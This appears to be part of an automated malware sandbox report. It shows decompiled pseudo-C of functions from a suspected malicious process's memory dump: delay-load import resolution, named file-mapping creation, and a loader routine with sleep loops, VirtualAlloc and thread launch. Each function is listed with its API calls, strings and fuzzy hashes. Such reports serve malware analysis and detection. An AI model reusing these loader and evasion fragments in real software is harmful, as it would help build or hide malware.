Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

HeapFree.KERNEL32(00000000,?,?), ref: 0100A059
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0100A065
RtlFreeHeap.NTDLL(00000000,?,?,056195B0), ref: 0100A071
HeapFree.KERNEL32(00000000,?), ref: 0100A07D
RtlFreeHeap.NTDLL(00000000,?), ref: 0100A089

Strings

Uxt, xrefs: 01009E3D

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID: Uxt
API String ID: 603507560-1536154274
Opcode ID: b008d7de2a0a11e1a81fed57c5467e3e5f1899bfd0789d6c4662cdf08fbd9804
Instruction ID: c5574d27354e5fb782abd3816c03dc754b55d297b304d1dbd6347864824aaa17
Opcode Fuzzy Hash: b008d7de2a0a11e1a81fed57c5467e3e5f1899bfd0789d6c4662cdf08fbd9804
Instruction Fuzzy Hash: 55911C71A00209EFEB22EFE8DC48AAE7BB9EF08354F144455F588D7290D73AD951DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01007780, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01007780(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x100d240);
					_v20 = 0;
					_v16 = 0;
					L0100B088();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x100d26c; // 0x2d0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x100d24c = 5;
						} else {
							_t68 = E010086F0(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x100d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E01009958(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E0100A79A(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x100d244);
							goto L21;
						} else {
							__eflags =  *0x100d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E010014EF();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x100d248);
								L21:
								L0100B088();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x100d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x01007780
0x01007792
0x01007795
0x010077a1
0x010077a7
0x010077ac
0x01007913
0x010077b2
0x010077b2
0x010077b4
0x010077b9
0x010077ba
0x010077c0
0x010077c3
0x010077c6
0x010077d4
0x010077df
0x010077e2
0x010077e4
0x010077f1
0x010077fb
0x010077fd
0x01007802
0x01007807
0x01007812
0x01007812
0x01007809
0x01007809
0x01007810
0x00000000
0x00000000
0x01007810
0x0100781c
0x00000000
0x0100781f
0x01007823
0x0100782e
0x0100782e
0x01007835
0x0100783e
0x01007845
0x0100784e
0x01007851
0x01007854
0x01007859
0x0100785e
0x00000000
0x00000000
0x01007860
0x01007863
0x01007866
0x01007869
0x00000000
0x0100786b
0x0100787a
0x0100787a
0x00000000
0x010078a8
0x010078a8
0x010078ad
0x010078cc
0x010078ce
0x010078d3
0x010078d4
0x00000000
0x010078af
0x010078af
0x010078b5
0x00000000
0x010078b7
0x010078b7
0x010078bc
0x010078be
0x010078c3
0x010078c4
0x010078da
0x010078da
0x010078e2
0x010078ed
0x010078f0
0x010078fb
0x010078fd
0x01007900
0x01007902
0x00000000
0x01007908
0x00000000
0x01007908
0x01007902
0x010078b5
0x00000000
0x010078ad
0x0100787d
0x0100787f
0x01007882
0x01007883
0x01007883
0x01007887
0x01007891
0x01007891
0x01007897
0x0100789a
0x0100789a
0x010078a0
0x010078a0
0x0100791d
0x00000000

APIs

memset.NTDLL ref: 01007795
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010077A1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 010077C6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 010077E2
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010077FB
HeapFree.KERNEL32(00000000,00000000), ref: 01007891
CloseHandle.KERNEL32(?), ref: 010078A0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 010078DA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,010019AA,?), ref: 010078F0
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010078FB

Part of subcall function 010086F0: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05619388,00000000,?,747DF710,00000000,747DF730), ref: 0100873F
Part of subcall function 010086F0: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,056193C0,?,00000000,30314549,00000014,004F0053,0561937C), ref: 010087DC
Part of subcall function 010086F0: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0100780E), ref: 010087EE

GetLastError.KERNEL32 ref: 0100790D

Strings

@MxtNxt, xrefs: 0100790D
Uxt, xrefs: 01007891

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uxt$@MxtNxt
API String ID: 3521023985-2342693527
Opcode ID: 47d2733608d6375bf70b262b96ef3c0636eb53cea7826f3cc8d248247597ea65
Instruction ID: 337d56bca8ae5c5bab6d38917c38d0b5b179d3c2668658e88ebb0d03c509ea7f
Opcode Fuzzy Hash: 47d2733608d6375bf70b262b96ef3c0636eb53cea7826f3cc8d248247597ea65
Instruction Fuzzy Hash: 8C516D71801229ABEF23DFD8DC44DEEBFB8EF09720F208655F595A2184D7399640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100ADA5, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0100ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x1000000;
				_t115 = _t139[3] + 0x1000000;
				_t131 = _t139[4] + 0x1000000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x1000000;
				_v16 = _t139[5] + 0x1000000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x1000002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x100d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x100d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x100d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x100d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x100d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x100d198; // 0x0
										 *_t102 = _t125;
										 *0x100d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x100d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x0100adb4
0x0100adca
0x0100add0
0x0100add2
0x0100add7
0x0100addd
0x0100ade2
0x0100ade5
0x0100adf3
0x0100adfa
0x0100adfd
0x0100ae00
0x0100ae01
0x0100ae04
0x0100ae07
0x0100ae0a
0x0100ae0f
0x0100ae1e
0x00000000
0x0100ae24
0x0100ae2e
0x0100ae38
0x0100ae3d
0x0100ae3f
0x0100ae49
0x0100ae4c
0x0100ae4f
0x0100ae55
0x0100ae57
0x0100ae57
0x0100ae5a
0x0100ae5d
0x0100ae62
0x0100ae66
0x0100ae79
0x0100ae7b
0x0100af23
0x0100af23
0x0100af2a
0x0100af2d
0x0100af37
0x0100af37
0x0100af3b
0x0100afb9
0x0100afbc
0x0100afbe
0x0100afbe
0x0100afc5
0x0100afc7
0x0100afd1
0x0100afd4
0x0100afd7
0x0100afd7
0x00000000
0x0100af3d
0x0100af40
0x0100af6e
0x0100af78
0x0100af7c
0x0100af84
0x0100af87
0x0100af8e
0x0100af98
0x0100af98
0x0100af9c
0x0100afa1
0x0100afb0
0x0100afb6
0x0100afb6
0x0100af9c
0x00000000
0x0100af47
0x0100af4a
0x0100af52
0x0100af67
0x0100af6c
0x00000000
0x00000000
0x0100af6c
0x00000000
0x0100af52
0x0100af40
0x0100af3b
0x0100ae81
0x0100ae88
0x0100ae98
0x0100ae9b
0x0100aea1
0x0100aea5
0x0100aee8
0x0100aef4
0x0100af1d
0x0100aef6
0x0100aefa
0x0100af00
0x0100af08
0x0100af0a
0x0100af0d
0x0100af13
0x0100af15
0x0100af15
0x0100af08
0x0100aefa
0x00000000
0x0100aef4
0x0100aead
0x0100aeb0
0x0100aeb7
0x0100aec7
0x0100aeca
0x0100aeda
0x00000000
0x0100aee0
0x0100aec1
0x0100aec5
0x00000000
0x00000000
0x00000000
0x0100aec5
0x0100ae92
0x0100ae96
0x00000000
0x00000000
0x00000000
0x0100ae96
0x0100ae6f
0x0100ae73
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0100AE1E
LoadLibraryA.KERNELBASE(?), ref: 0100AE9B
GetLastError.KERNEL32 ref: 0100AEA7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0100AEDA

Strings

@MxtNxt, xrefs: 0100AEA7, 0100AF7E
$, xrefs: 0100ADF3

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MxtNxt
API String ID: 948315288-3494183316
Opcode ID: 82f2b4e5425dd8972920a3356469ea5d6feafad6a0910282717a5d7633962243
Instruction ID: 8a2ed2eb35d2c9a24c45412d561f19a3bec82b62a4296f3334ee288fec23bb2e
Opcode Fuzzy Hash: 82f2b4e5425dd8972920a3356469ea5d6feafad6a0910282717a5d7633962243
Instruction Fuzzy Hash: D5811DB5A00705EFEB62CFD8D984BAEB7F5AB48310F10416DE685D7280DB74E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E10195D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E10195D(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E102130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e104144;
				_push(_t15 + 0x6e10505e);
				_push(_t15 + 0x6e105054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E10212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e104148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e10195d
0x6e101966
0x6e10196a
0x6e101970
0x6e101975
0x6e10197a
0x6e10197d
0x6e101980
0x6e101985
0x6e101986
0x6e101989
0x6e101994
0x6e10199b
0x6e10199f
0x6e1019a1
0x6e1019a2
0x6e1019a5
0x6e1019aa
0x6e1019b4
0x6e1019b6
0x6e1019b6
0x6e1019ca
0x6e1019d0
0x6e1019d4
0x6e101a24
0x6e1019d6
0x6e1019df
0x6e1019f5
0x6e1019fd
0x6e101a0f
0x6e101a13
0x00000000
0x00000000
0x6e1019ff
0x6e101a02
0x6e101a07
0x6e101a09
0x6e101a09
0x6e1019ea
0x6e1019ec
0x6e101a15
0x6e101a16
0x6e101a16
0x6e1019df
0x6e101a2c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?,?), ref: 6E10196A
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E101980
_snwprintf.NTDLL ref: 6E1019A5
CreateFileMappingW.KERNELBASE(000000FF,6E104148,00000004,00000000,?,?), ref: 6E1019CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E1019E1
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1019F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E101A0D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A), ref: 6E101A16
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E101A1E

Strings

`RxtAxt, xrefs: 6E10196A

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: f37f1f201a9cdb8f51bb2ad89220c44300efe75c637ee84a17cddc507e4d6877
Instruction ID: 0a398df462d4b52934a339d8f07072e98a5c42ff27d9fa691a5d1d8923e55fda
Opcode Fuzzy Hash: f37f1f201a9cdb8f51bb2ad89220c44300efe75c637ee84a17cddc507e4d6877
Instruction Fuzzy Hash: AF2198B2600148FFDB11DFE8CC88EDE77ADEB55358F118025F615E7140DE34998AAB60

Uniqueness

Uniqueness Score: -1.00%

Function 0100165F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0100165F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0100B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x100d2a4; // 0x460a5a8
				_t5 = _t13 + 0x100e862; // 0x5618e0a
				_t6 = _t13 + 0x100e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0100AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x100d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x0100165f
0x01001667
0x0100166b
0x01001671
0x01001676
0x0100167b
0x0100167e
0x01001681
0x01001686
0x01001687
0x0100168a
0x0100168f
0x01001696
0x010016a0
0x010016a2
0x010016a3
0x010016a6
0x010016c2
0x010016c8
0x010016cc
0x0100171a
0x010016ce
0x010016db
0x010016eb
0x010016f3
0x01001705
0x01001709
0x00000000
0x00000000
0x010016f5
0x010016f8
0x010016fd
0x010016ff
0x010016ff
0x010016dd
0x010016df
0x0100170b
0x0100170c
0x0100170c
0x010016db
0x01001721

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0100187D,?,?,4D283A53,?,?), ref: 0100166B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 01001681
_snwprintf.NTDLL ref: 010016A6
CreateFileMappingW.KERNELBASE(000000FF,0100D2A8,00000004,00000000,00001000,?), ref: 010016C2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0100187D,?,?,4D283A53), ref: 010016D4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 010016EB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0100187D,?,?), ref: 0100170C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0100187D,?,?,4D283A53), ref: 01001714

Strings

@MxtNxt, xrefs: 010016CE, 01001714

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MxtNxt
API String ID: 1814172918-1701360479
Opcode ID: 1249e284ae5c62d3f0d4f6917d9c000f44fb2b39fe47beb1cad3b697c99f0e5e
Instruction ID: 88f25a10efd7ce544c813ec5a71cf3e78439e02a95203a703f6958c761d4fec6
Opcode Fuzzy Hash: 1249e284ae5c62d3f0d4f6917d9c000f44fb2b39fe47beb1cad3b697c99f0e5e
Instruction Fuzzy Hash: 4B21C076640204BBF723EBA8CC05F8E7BB9BB48710F244261F689E71C0DA71DA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E101D6E, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E101D6E(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E101800();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E101C4E(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E101F56(E6E101718,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E1012E5(_t44,  &_a4) != 0) {
					 *0x6e104138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e104138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E101072(_t48 + _t14);
				 *0x6e104138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E10105D(_t43);
				goto L11;
			}

0x6e101d75
0x6e101d7c
0x6e101d81
0x6e101e71
0x6e101e71
0x6e101d88
0x6e101d8c
0x6e101d92
0x6e101da0
0x6e101da1
0x6e101da4
0x6e101da7
0x6e101db0
0x6e101db3
0x6e101db9
0x6e101dbc
0x6e101dc3
0x6e101e6e
0x00000000
0x6e101e6e
0x6e101dcd
0x6e101e1e
0x6e101e1e
0x6e101e34
0x6e101e39
0x6e101e61
0x6e101e3b
0x6e101e3e
0x6e101e44
0x6e101e49
0x6e101e50
0x6e101e50
0x6e101e57
0x6e101e57
0x6e101e64
0x6e101e6a
0x6e101e6c
0x6e101e6c
0x00000000
0x6e101e6a
0x6e101dda
0x6e101e18
0x00000000
0x6e101e18
0x6e101ddc
0x6e101ddf
0x6e101de8
0x6e101dea
0x6e101dee
0x6e101e10
0x6e101e10
0x00000000
0x6e101e10
0x6e101df0
0x6e101df5
0x6e101dfa
0x6e101e01
0x00000000
0x00000000
0x6e101e06
0x6e101e09
0x00000000

APIs

Part of subcall function 6E101800: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E101D7A,747863F0), ref: 6E10180F
Part of subcall function 6E101800: GetVersion.KERNEL32 ref: 6E10181E
Part of subcall function 6E101800: GetCurrentProcessId.KERNEL32 ref: 6E10183A
Part of subcall function 6E101800: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E101853

GetSystemTime.KERNEL32(?,00000000,747863F0), ref: 6E101D8C
SwitchToThread.KERNEL32 ref: 6E101D92

Part of subcall function 6E101C4E: VirtualAlloc.KERNELBASE(00000000,6E101DAC,00003000,00000004,?,?,6E101DAC,00000000), ref: 6E101CA4
Part of subcall function 6E101C4E: memcpy.NTDLL(?,?,6E101DAC,?,?,6E101DAC,00000000), ref: 6E101D3B
Part of subcall function 6E101C4E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E101DAC,00000000), ref: 6E101D56

Sleep.KERNELBASE(00000000,00000000), ref: 6E101DB3
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E101DE8
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E101E06
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E101E3E
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E101E50
CloseHandle.KERNEL32(00000000), ref: 6E101E57
GetLastError.KERNEL32(?,00000000), ref: 6E101E5F
GetLastError.KERNEL32 ref: 6E101E6C

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
